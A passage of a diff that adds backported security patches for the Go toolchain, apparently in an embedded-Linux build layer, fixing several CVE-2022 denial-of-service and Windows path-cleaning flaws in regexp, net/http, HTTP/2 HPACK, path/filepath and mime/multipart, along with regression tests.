+index 55bd20d..60491d5 100644
+--- a/src/regexp/syntax/parse.go
++++ b/src/regexp/syntax/parse.go
+@@ -90,15 +90,49 @@ const (
+ // until we've allocated at least maxHeight Regexp structures.
+ const maxHeight = 1000
+ 
++// maxSize is the maximum size of a compiled regexp in Insts.
++// It too is somewhat arbitrarily chosen, but the idea is to be large enough
++// to allow significant regexps while at the same time small enough that
++// the compiled form will not take up too much memory.
++// 128 MB is enough for a 3.3 million Inst structures, which roughly
++// corresponds to a 3.3 MB regexp.
++const (
++	maxSize  = 128 << 20 / instSize
++	instSize = 5 * 8 // byte, 2 uint32, slice is 5 64-bit words
++)
++
++// maxRunes is the maximum number of runes allowed in a regexp tree
++// counting the runes in all the nodes.
++// Ignoring character classes p.numRunes is always less than the length of the regexp.
++// Character classes can make it much larger: each \pL adds 1292 runes.
++// 128 MB is enough for 32M runes, which is over 26k \pL instances.
++// Note that repetitions do not make copies of the rune slices,
++// so \pL{1000} is only one rune slice, not 1000.
++// We could keep a cache of character classes we've seen,
++// so that all the \pL we see use the same rune list,
++// but that doesn't remove the problem entirely:
++// consider something like [\pL01234][\pL01235][\pL01236]...[\pL^&*()].
++// And because the Rune slice is exposed directly in the Regexp,
++// there is not an opportunity to change the representation to allow
++// partial sharing between different character classes.
++// So the limit is the best we can do.
++const (
++	maxRunes = 128 << 20 / runeSize
++	runeSize = 4 // rune is int32
++)
++
+ type parser struct {
+ 	flags       Flags     // parse mode flags
+ 	stack       []*Regexp // stack of parsed expressions
+ 	free        *Regexp
+ 	numCap      int // number of capturing groups seen
+ 	wholeRegexp string
+-	tmpClass    []rune          // temporary char class work space
+-	numRegexp   int             // number of regexps allocated
+-	height      map[*Regexp]int // regexp height for height limit check
++	tmpClass    []rune            // temporary char class work space
++	numRegexp   int               // number of regexps allocated
++	numRunes    int               // number of runes in char classes
++	repeats     int64             // product of all repetitions seen
++	height      map[*Regexp]int   // regexp height, for height limit check
++	size        map[*Regexp]int64 // regexp compiled size, for size limit check
+ }
+ 
+ func (p *parser) newRegexp(op Op) *Regexp {
+@@ -122,6 +156,104 @@ func (p *parser) reuse(re *Regexp) {
+ 	p.free = re
+ }
+ 
++func (p *parser) checkLimits(re *Regexp) {
++	if p.numRunes > maxRunes {
++		panic(ErrInternalError)
++	}
++	p.checkSize(re)
++	p.checkHeight(re)
++}
++
++func (p *parser) checkSize(re *Regexp) {
++	if p.size == nil {
++		// We haven't started tracking size yet.
++		// Do a relatively cheap check to see if we need to start.
++		// Maintain the product of all the repeats we've seen
++		// and don't track if the total number of regexp nodes
++		// we've seen times the repeat product is in budget.
++		if p.repeats == 0 {
++			p.repeats = 1
++		}
++		if re.Op == OpRepeat {
++			n := re.Max
++			if n == -1 {
++				n = re.Min
++			}
++			if n <= 0 {
++				n = 1
++			}
++			if int64(n) > maxSize/p.repeats {
++				p.repeats = maxSize
++			} else {
++				p.repeats *= int64(n)
++			}
++		}
++		if int64(p.numRegexp) < maxSize/p.repeats {
++			return
++		}
++
++		// We need to start tracking size.
++		// Make the map and belatedly populate it
++		// with info about everything we've constructed so far.
++		p.size = make(map[*Regexp]int64)
++		for _, re := range p.stack {
++			p.checkSize(re)
++		}
++	}
++
++	if p.calcSize(re, true) > maxSize {
++		panic(ErrInternalError)
++	}
++}
++
++func (p *parser) calcSize(re *Regexp, force bool) int64 {
++	if !force {
++		if size, ok := p.size[re]; ok {
++			return size
++		}
++	}
++
++	var size int64
++	switch re.Op {
++	case OpLiteral:
++		size = int64(len(re.Rune))
++	case OpCapture, OpStar:
++		// star can be 1+ or 2+; assume 2 pessimistically
++		size = 2 + p.calcSize(re.Sub[0], false)
++	case OpPlus, OpQuest:
++		size = 1 + p.calcSize(re.Sub[0], false)
++	case OpConcat:
++		for _, sub := range re.Sub {
++			size += p.calcSize(sub, false)
++		}
++	case OpAlternate:
++		for _, sub := range re.Sub {
++			size += p.calcSize(sub, false)
++		}
++		if len(re.Sub) > 1 {
++			size += int64(len(re.Sub)) - 1
++		}
++	case OpRepeat:
++		sub := p.calcSize(re.Sub[0], false)
++		if re.Max == -1 {
++			if re.Min == 0 {
++				size = 2 + sub // x*
++			} else {
++				size = 1 + int64(re.Min)*sub // xxx+
++			}
++			break
++		}
++		// x{2,5} = xx(x(x(x)?)?)?
++		size = int64(re.Max)*sub + int64(re.Max-re.Min)
++	}
++
++	if size < 1 {
++		size = 1
++	}
++	p.size[re] = size
++	return size
++}
++
+ func (p *parser) checkHeight(re *Regexp) {
+ 	if p.numRegexp < maxHeight {
+ 		return
+@@ -158,6 +290,7 @@ func (p *parser) calcHeight(re *Regexp, force bool) int {
+ 
+ // push pushes the regexp re onto the parse stack and returns the regexp.
+ func (p *parser) push(re *Regexp) *Regexp {
++	p.numRunes += len(re.Rune)
+ 	if re.Op == OpCharClass && len(re.Rune) == 2 && re.Rune[0] == re.Rune[1] {
+ 		// Single rune.
+ 		if p.maybeConcat(re.Rune[0], p.flags&^FoldCase) {
+@@ -189,7 +322,7 @@ func (p *parser) push(re *Regexp) *Regexp {
+ 	}
+ 
+ 	p.stack = append(p.stack, re)
+-	p.checkHeight(re)
++	p.checkLimits(re)
+ 	return re
+ }
+ 
+@@ -305,7 +438,7 @@ func (p *parser) repeat(op Op, min, max int, before, after, lastRepeat string) (
+ 	re.Sub = re.Sub0[:1]
+ 	re.Sub[0] = sub
+ 	p.stack[n-1] = re
+-	p.checkHeight(re)
++	p.checkLimits(re)
+ 
+ 	if op == OpRepeat && (min >= 2 || max >= 2) && !repeatIsValid(re, 1000) {
+ 		return "", &Error{ErrInvalidRepeatSize, before[:len(before)-len(after)]}
+@@ -509,6 +642,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+ 
+ 			for j := start; j < i; j++ {
+ 				sub[j] = p.removeLeadingString(sub[j], len(str))
++				p.checkLimits(sub[j])
+ 			}
+ 			suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+ 
+@@ -566,6 +700,7 @@ func (p *parser) factor(sub []*Regexp) []*Regexp {
+ 			for j := start; j < i; j++ {
+ 				reuse := j != start // prefix came from sub[start]
+ 				sub[j] = p.removeLeadingRegexp(sub[j], reuse)
++				p.checkLimits(sub[j])
+ 			}
+ 			suffix := p.collapse(sub[start:i], OpAlternate) // recurse
+ 
+diff --git a/src/regexp/syntax/parse_test.go b/src/regexp/syntax/parse_test.go
+index 1ef6d8a..67e3c56 100644
+--- a/src/regexp/syntax/parse_test.go
++++ b/src/regexp/syntax/parse_test.go
+@@ -484,12 +484,15 @@ var invalidRegexps = []string{
+ 	`(?P<>a)`,
+ 	`[a-Z]`,
+ 	`(?i)[a-Z]`,
+-	`a{100000}`,
+-	`a{100000,}`,
+-	"((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",
+-	strings.Repeat("(", 1000) + strings.Repeat(")", 1000),
+-	strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000),
+ 	`\Q\E*`,
++	`a{100000}`,  // too much repetition
++	`a{100000,}`, // too much repetition
++	"((((((((((x{2}){2}){2}){2}){2}){2}){2}){2}){2}){2})",    // too much repetition
++	strings.Repeat("(", 1000) + strings.Repeat(")", 1000),    // too deep
++	strings.Repeat("(?:", 1000) + strings.Repeat(")*", 1000), // too deep
++	"(" + strings.Repeat("(xx?)", 1000) + "){1000}",          // too long
++	strings.Repeat("(xx?){1000}", 1000),                      // too long
++	strings.Repeat(`\pL`, 27000),                             // too many runes
+ }
+ 
+ var onlyPerl = []string{
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
new file mode 100644
index 0000000000..8bf22ee4d4
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41717.patch
@@ -0,0 +1,75 @@
+From 618120c165669c00a1606505defea6ca755cdc27 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Wed, 30 Nov 2022 16:46:33 -0500
+Subject: [PATCH] [release-branch.go1.19] net/http: update bundled
+ golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+For #56350.
+For #57009.
+Fixes CVE-2022-41717.
+
+Change-Id: I5c6ce546add81f361dcf0d5123fa4eaaf8f0a03b
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1663835
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/455363
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Jenny Rakoczy <jenny@golang.org>
+Reviewed-by: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27]
+CVE-2022-41717
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/net/http/h2_bundle.go | 18 +++++++++++-------
+ 1 file changed, 11 insertions(+), 7 deletions(-)
+
+diff --git a/src/net/http/h2_bundle.go b/src/net/http/h2_bundle.go
+index 83f2a72..cc03a62 100644
+--- a/src/net/http/h2_bundle.go
++++ b/src/net/http/h2_bundle.go
+@@ -4096,6 +4096,7 @@ type http2serverConn struct {
+	headerTableSize             uint32
+	peerMaxHeaderListSize       uint32            // zero means unknown (default)
+	canonHeader                 map[string]string // http2-lower-case -> Go-Canonical-Case
++	canonHeaderKeysSize         int               // canonHeader keys size in bytes
+	writingFrame                bool              // started writing a frame (on serve goroutine or separate)
+	writingFrameAsync           bool              // started a frame on its own goroutine but haven't heard back on wroteFrameCh
+	needsFrameFlush             bool              // last frame write wasn't a flush
+@@ -4278,6 +4279,13 @@ func (sc *http2serverConn) condlogf(err error, format string, args ...interface{
+	}
+ }
+
++// maxCachedCanonicalHeadersKeysSize is an arbitrarily-chosen limit on the size
++// of the entries in the canonHeader cache.
++// This should be larger than the size of unique, uncommon header keys likely to
++// be sent by the peer, while not so high as to permit unreasonable memory usage
++// if the peer sends an unbounded number of unique header keys.
++const http2maxCachedCanonicalHeadersKeysSize = 2048
++
+ func (sc *http2serverConn) canonicalHeader(v string) string {
+	sc.serveG.check()
+	http2buildCommonHeaderMapsOnce()
+@@ -4293,14 +4301,10 @@ func (sc *http2serverConn) canonicalHeader(v string) string {
+		sc.canonHeader = make(map[string]string)
+	}
+	cv = CanonicalHeaderKey(v)
+-	// maxCachedCanonicalHeaders is an arbitrarily-chosen limit on the number of
+-	// entries in the canonHeader cache. This should be larger than the number
+-	// of unique, uncommon header keys likely to be sent by the peer, while not
+-	// so high as to permit unreaasonable memory usage if the peer sends an unbounded
+-	// number of unique header keys.
+-	const maxCachedCanonicalHeaders = 32
+-	if len(sc.canonHeader) < maxCachedCanonicalHeaders {
++	size := 100 + len(v)*2 // 100 bytes of map overhead + key + value
++	if sc.canonHeaderKeysSize+size <= http2maxCachedCanonicalHeadersKeysSize {
+		sc.canonHeader[v] = cv
++		sc.canonHeaderKeysSize += size
+	}
+	return cv
+ }
+--
+2.30.2
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
new file mode 100644
index 0000000000..f5bffd7a0b
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-1.patch
@@ -0,0 +1,53 @@
+From 94e0c36694fb044e81381d112fef3692de7cdf52 Mon Sep 17 00:00:00 2001
+From: Yasuhiro Matsumoto <mattn.jp@gmail.com>
+Date: Fri, 22 Apr 2022 10:07:51 +0900
+Subject: [PATCH 1/2] path/filepath: do not remove prefix "." when following
+ path contains ":".
+
+Fixes #52476
+
+Change-Id: I9eb72ac7dbccd6322d060291f31831dc389eb9bb
+Reviewed-on: https://go-review.googlesource.com/c/go/+/401595
+Auto-Submit: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Alex Brainman <alex.brainman@gmail.com>
+Run-TryBot: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Ian Lance Taylor <iant@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/9cd1818a7d019c02fa4898b3e45a323e35033290
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 14 +++++++++++++-
+ 1 file changed, 13 insertions(+), 1 deletion(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 26f1833..92dc090 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -116,9 +116,21 @@ func Clean(path string) string {
+		case os.IsPathSeparator(path[r]):
+			// empty path element
+			r++
+-		case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
++		case path[r] == '.' && r+1 == n:
+			// . element
+			r++
++		case path[r] == '.' && os.IsPathSeparator(path[r+1]):
++			// ./ element
++			r++
++
++			for r < len(path) && os.IsPathSeparator(path[r]) {
++				r++
++			}
++			if out.w == 0 && volumeNameLen(path[r:]) > 0 {
++				// When joining prefix "." and an absolute path on Windows,
++				// the prefix should not be removed.
++				out.append('.')
++			}
+		case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+			// .. element: remove to last separator
+			r += 2
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
new file mode 100644
index 0000000000..e1f7a55581
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41722-2.patch
@@ -0,0 +1,104 @@
+From b8803cb711ae163b8e67897deb6cf8c49702227c Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 12 Dec 2022 16:43:37 -0800
+Subject: [PATCH 2/2] path/filepath: do not Clean("a/../c:/b") into c:\b on
+ Windows
+
+Do not permit Clean to convert a relative path into one starting
+with a drive reference. This change causes Clean to insert a .
+path element at the start of a path when the original path does not
+start with a volume name, and the first path element would contain
+a colon.
+
+This may introduce a spurious but harmless . path element under
+some circumstances. For example, Clean("a/../b:/../c") becomes `.\c`.
+
+This reverts CL 401595, since the change here supersedes the one
+in that CL.
+
+Thanks to RyotaK (https://twitter.com/ryotkak) for reporting this issue.
+
+Updates #57274
+Fixes #57276
+Fixes CVE-2022-41722
+
+Change-Id: I837446285a03aa74c79d7642720e01f354c2ca17
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1675249
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+TryBot-Result: Security TryBots <security-trybots@go-security-trybots.iam.gserviceaccount.com>
+(cherry picked from commit 8ca37f4813ef2f64600c92b83f17c9f3ca6c03a5)
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728944
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468119
+Reviewed-by: Than McIntosh <thanm@google.com>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/bdf07c2e168baf736e4c057279ca12a4d674f18c
+CVE: CVE-2022-41722
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/path/filepath/path.go | 27 ++++++++++++++-------------
+ 1 file changed, 14 insertions(+), 13 deletions(-)
+
+diff --git a/src/path/filepath/path.go b/src/path/filepath/path.go
+index 92dc090..f0f095e 100644
+--- a/src/path/filepath/path.go
++++ b/src/path/filepath/path.go
+@@ -14,6 +14,7 @@ package filepath
+ import (
+	"errors"
+	"os"
++	"runtime"
+	"sort"
+	"strings"
+ )
+@@ -116,21 +117,9 @@ func Clean(path string) string {
+		case os.IsPathSeparator(path[r]):
+			// empty path element
+			r++
+-		case path[r] == '.' && r+1 == n:
++		case path[r] == '.' && (r+1 == n || os.IsPathSeparator(path[r+1])):
+			// . element
+			r++
+-		case path[r] == '.' && os.IsPathSeparator(path[r+1]):
+-			// ./ element
+-			r++
+-
+-			for r < len(path) && os.IsPathSeparator(path[r]) {
+-				r++
+-			}
+-			if out.w == 0 && volumeNameLen(path[r:]) > 0 {
+-				// When joining prefix "." and an absolute path on Windows,
+-				// the prefix should not be removed.
+-				out.append('.')
+-			}
+		case path[r] == '.' && path[r+1] == '.' && (r+2 == n || os.IsPathSeparator(path[r+2])):
+			// .. element: remove to last separator
+			r += 2
+@@ -156,6 +145,18 @@ func Clean(path string) string {
+			if rooted && out.w != 1 || !rooted && out.w != 0 {
+				out.append(Separator)
+			}
++			// If a ':' appears in the path element at the start of a Windows path,
++			// insert a .\ at the beginning to avoid converting relative paths
++			// like a/../c: into c:.
++			if runtime.GOOS == "windows" && out.w == 0 && out.volLen == 0 && r != 0 {
++				for i := r; i < n && !os.IsPathSeparator(path[i]); i++ {
++					if path[i] == ':' {
++						out.append('.')
++						out.append(Separator)
++						break
++					}
++				}
++			}
+			// copy element
+			for ; r < n && !os.IsPathSeparator(path[r]); r++ {
+				out.append(path[r])
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
new file mode 100644
index 0000000000..a93fa31dcd
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41723.patch
@@ -0,0 +1,156 @@
+From 451766789f646617157c725e20c955d4a9a70d4e Mon Sep 17 00:00:00 2001
+From: Roland Shoemaker <bracewell@google.com>
+Date: Mon, 6 Feb 2023 10:03:44 -0800
+Subject: [PATCH] net/http: update bundled golang.org/x/net/http2
+
+Disable cmd/internal/moddeps test, since this update includes PRIVATE
+track fixes.
+
+Fixes CVE-2022-41723
+Fixes #58355
+Updates #57855
+
+Change-Id: Ie870562a6f6e44e4e8f57db6a0dde1a41a2b090c
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1728939
+Reviewed-by: Damien Neil <dneil@google.com>
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Tatiana Bradley <tatianabradley@google.com>
+Run-TryBot: Roland Shoemaker <bracewell@google.com>
+Reviewed-on: https://go-review.googlesource.com/c/go/+/468118
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Pratt <mpratt@google.com>
+Auto-Submit: Michael Pratt <mpratt@google.com>
+Reviewed-by: Than McIntosh <thanm@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/5c3e11bd0b5c0a86e5beffcd4339b86a902b21c3]
+CVE: CVE-2022-41723
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/vendor/golang.org/x/net/http2/hpack/hpack.go | 79 +++++++++++++++---------
+ 1 file changed, 49 insertions(+), 30 deletions(-)
+
+diff --git a/src/vendor/golang.org/x/net/http2/hpack/hpack.go b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+index 85f18a2..02e80e3 100644
+--- a/src/vendor/golang.org/x/net/http2/hpack/hpack.go
++++ b/src/vendor/golang.org/x/net/http2/hpack/hpack.go
+@@ -359,6 +359,7 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+
+	var hf HeaderField
+	wantStr := d.emitEnabled || it.indexed()
++	var undecodedName undecodedString
+	if nameIdx > 0 {
+		ihf, ok := d.at(nameIdx)
+		if !ok {
+@@ -366,15 +367,27 @@ func (d *Decoder) parseFieldLiteral(n uint8, it indexType) error {
+		}
+		hf.Name = ihf.Name
+	} else {
+-		hf.Name, buf, err = d.readString(buf, wantStr)
++		undecodedName, buf, err = d.readString(buf)
+		if err != nil {
+			return err
+		}
+	}
+-	hf.Value, buf, err = d.readString(buf, wantStr)
++	undecodedValue, buf, err := d.readString(buf)
+	if err != nil {
+		return err
+	}
++	if wantStr {
++		if nameIdx <= 0 {
++			hf.Name, err = d.decodeString(undecodedName)
++			if err != nil {
++				return err
++			}
++		}
++		hf.Value, err = d.decodeString(undecodedValue)
++		if err != nil {
++			return err
++		}
++	}
+	d.buf = buf
+	if it.indexed() {
+		d.dynTab.add(hf)
+@@ -459,46 +472,52 @@ func readVarInt(n byte, p []byte) (i uint64, remain []byte, err error) {
+	return 0, origP, errNeedMore
+ }
+
+-// readString decodes an hpack string from p.
++// readString reads an hpack string from p.
+ //
+-// wantStr is whether s will be used. If false, decompression and
+-// []byte->string garbage are skipped if s will be ignored
+-// anyway. This does mean that huffman decoding errors for non-indexed
+-// strings past the MAX_HEADER_LIST_SIZE are ignored, but the server
+-// is returning an error anyway, and because they're not indexed, the error
+-// won't affect the decoding state.
+-func (d *Decoder) readString(p []byte, wantStr bool) (s string, remain []byte, err error) {
++// It returns a reference to the encoded string data to permit deferring decode costs
++// until after the caller verifies all data is present.
++func (d *Decoder) readString(p []byte) (u undecodedString, remain []byte, err error) {
+	if len(p) == 0 {
+-		return "", p, errNeedMore
++		return u, p, errNeedMore
+	}
+	isHuff := p[0]&128 != 0
+	strLen, p, err := readVarInt(7, p)
+	if err != nil {
+-		return "", p, err
++		return u, p, err
+	}
+	if d.maxStrLen != 0 && strLen > uint64(d.maxStrLen) {
+-		return "", nil, ErrStringLength
++		// Returning an error here means Huffman decoding errors
++		// for non-indexed strings past the maximum string length
++		// are ignored, but the server is returning an error anyway
++		// and because the string is not indexed the error will not
++		// affect the decoding state.
++		return u, nil, ErrStringLength
+	}
+	if uint64(len(p)) < strLen {
+-		return "", p, errNeedMore
+-	}
+-	if !isHuff {
+-		if wantStr {
+-			s = string(p[:strLen])
+-		}
+-		return s, p[strLen:], nil
++		return u, p, errNeedMore
+	}
++	u.isHuff = isHuff
++	u.b = p[:strLen]
++	return u, p[strLen:], nil
++}
+
+-	if wantStr {
+-		buf := bufPool.Get().(*bytes.Buffer)
+-		buf.Reset() // don't trust others
+-		defer bufPool.Put(buf)
+-		if err := huffmanDecode(buf, d.maxStrLen, p[:strLen]); err != nil {
+-			buf.Reset()
+-			return "", nil, err
+-		}
++type undecodedString struct {
++	isHuff bool
++	b      []byte
++}
++
++func (d *Decoder) decodeString(u undecodedString) (string, error) {
++	if !u.isHuff {
++		return string(u.b), nil
++	}
++	buf := bufPool.Get().(*bytes.Buffer)
++	buf.Reset() // don't trust others
++	var s string
++	err := huffmanDecode(buf, d.maxStrLen, u.b)
++	if err == nil {
+		s = buf.String()
+-		buf.Reset() // be nice to GC
+	}
+-	return s, p[strLen:], nil
++	buf.Reset() // be nice to GC
++	bufPool.Put(buf)
++	return s, err
+ }
+--
+2.7.4
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
new file mode 100644
index 0000000000..37ebc41947
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre1.patch
@@ -0,0 +1,85 @@
+From 874b3132a84cf76da6a48978826c04c380a37a50 Mon Sep 17 00:00:00 2001
+From: avivklas <avivklas@gmail.com>
+Date: Fri, 7 Aug 2020 21:50:12 +0300
+Subject: [PATCH] mime/multipart: return overflow errors in Reader.ReadForm
+
+Updates Reader.ReadForm to check for overflow errors that may
+result from a leeway addition of 10MiB to the input argument
+maxMemory.
+
+Fixes #40430
+
+Change-Id: I510b8966c95c51d04695ba9d08fcfe005fd11a5d
+Reviewed-on: https://go-review.googlesource.com/c/go/+/247477
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+Trust: Cuong Manh Le <cuong.manhle.vn@gmail.com>
+Trust: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Emmanuel Odeke <emm.odeke@gmail.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/874b3132a84cf76da6a48978826c04c380a37a50]
+CVE: CVE-2022-41725 #Dependency Patch1
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/mime/multipart/formdata.go      |  4 ++++
+ src/mime/multipart/formdata_test.go | 18 ++++++++++++++++++
+ 2 files changed, 22 insertions(+)
+
+diff --git a/src/mime/multipart/formdata.go b/src/mime/multipart/formdata.go
+index 832d0ad693666..4eb31012941ac 100644
+--- a/src/mime/multipart/formdata.go
++++ b/src/mime/multipart/formdata.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ 	"bytes"
+ 	"errors"
++	"fmt"
+ 	"io"
+ 	"io/ioutil"
+ 	"net/textproto"
+@@ -41,6 +42,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ 
+ 	// Reserve an additional 10 MB for non-file parts.
+ 	maxValueBytes := maxMemory + int64(10<<20)
++	if maxValueBytes <= 0 {
++		return nil, fmt.Errorf("multipart: integer overflow from maxMemory(%d) + 10MiB for non-file parts", maxMemory)
++	}
+ 	for {
+ 		p, err := r.NextPart()
+ 		if err == io.EOF {
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 7d756c8c244a0..7112e0d3727fe 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -7,6 +7,7 @@ package multipart
+ import (
+ 	"bytes"
+ 	"io"
++	"math"
+ 	"os"
+ 	"strings"
+ 	"testing"
+@@ -52,6 +53,23 @@ func TestReadFormWithNamelessFile(t *testing.T) {
+ 	}
+ }
+ 
++// Issue 40430: Ensure that we report integer overflows in additions of maxMemory,
++// instead of silently and subtly failing without indication.
++func TestReadFormMaxMemoryOverflow(t *testing.T) {
++	b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
++	r := NewReader(b, boundary)
++	f, err := r.ReadForm(math.MaxInt64)
++	if err == nil {
++		t.Fatal("Unexpected a non-nil error")
++	}
++	if f != nil {
++		t.Fatalf("Unexpected returned a non-nil form: %v\n", f)
++	}
++	if g, w := err.Error(), "integer overflow from maxMemory"; !strings.Contains(g, w) {
++		t.Errorf(`Error mismatch\n%q\ndid not contain\n%q`, g, w)
++	}
++}
++
+ func TestReadFormWithTextContentType(t *testing.T) {
+ 	// From https://github.com/golang/go/issues/24041
+ 	b := strings.NewReader(strings.ReplaceAll(messageWithTextContentType, "\n", "\r\n"))
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
new file mode 100644
index 0000000000..b951ee893e
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2022-41725-pre2.patch
@@ -0,0 +1,97 @@
+From 4e5a313524da62600eb59dbf98624cfe946456f8 Mon Sep 17 00:00:00 2001
+From: Emmanuel T Odeke <emmanuel@orijtech.com>
+Date: Tue, 20 Oct 2020 04:11:12 -0700
+Subject: [PATCH] net/http: test that ParseMultipartForm catches overflows
+
+Tests that if the combination of:
+* HTTP multipart file payload size
+* ParseMultipartForm's maxMemory parameter
+* the internal leeway buffer size of 10MiB
+
+overflows, then we'll report an overflow instead of silently
+passing.
+
+Reapplies and fixes CL 254977, which was reverted in CL 263658.
+
+The prior test lacked a res.Body.Close(), so fixed that and
+added a leaked Transport check to verify correctness.
+
+Updates 40430.
+
+Change-Id: I3c0f7ef43d621f6eb00f07755f04f9f36c51f98f
+Reviewed-on: https://go-review.googlesource.com/c/go/+/263817
+Run-TryBot: Emmanuel Odeke <emm.odeke@gmail.com>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Bryan C. Mills <bcmills@google.com>
+Trust: Damien Neil <dneil@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/4e5a313524da62600eb59dbf98624cfe946456f8]
+CVE: CVE-2022-41725 #Dependency Patch2
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/net/http/request_test.go | 45 ++++++++++++++++++++++++++++++++++++
+ 1 file changed, 45 insertions(+)
+
+diff --git a/src/net/http/request_test.go b/src/net/http/request_test.go
+index b4ef472e71229..19526b9ad791a 100644
+--- a/src/net/http/request_test.go
++++ b/src/net/http/request_test.go
+@@ -13,6 +13,7 @@ import (
+ 	"fmt"
+ 	"io"
+ 	"io/ioutil"
++	"math"
+ 	"mime/multipart"
+ 	. "net/http"
+ 	"net/http/httptest"
+@@ -245,6 +246,50 @@ func TestParseMultipartForm(t *testing.T) {
+ 	}
+ }
+ 
++// Issue #40430: Test that if maxMemory for ParseMultipartForm when combined with
++// the payload size and the internal leeway buffer size of 10MiB overflows, that we
++// correctly return an error.
++func TestMaxInt64ForMultipartFormMaxMemoryOverflow(t *testing.T) {
++	defer afterTest(t)
++
++	payloadSize := 1 << 10
++	cst := httptest.NewServer(HandlerFunc(func(rw ResponseWriter, req *Request) {
++		// The combination of:
++		//      MaxInt64 + payloadSize + (internal spare of 10MiB)
++		// triggers the overflow. See issue https://golang.org/issue/40430/
++		if err := req.ParseMultipartForm(math.MaxInt64); err != nil {
++			Error(rw, err.Error(), StatusBadRequest)
++			return
++		}
++	}))
++	defer cst.Close()
++	fBuf := new(bytes.Buffer)
++	mw := multipart.NewWriter(fBuf)
++	mf, err := mw.CreateFormFile("file", "myfile.txt")
++	if err != nil {
++		t.Fatal(err)
++	}
++	if _, err := mf.Write(bytes.Repeat([]byte("abc"), payloadSize)); err != nil {
++		t.Fatal(err)
++	}
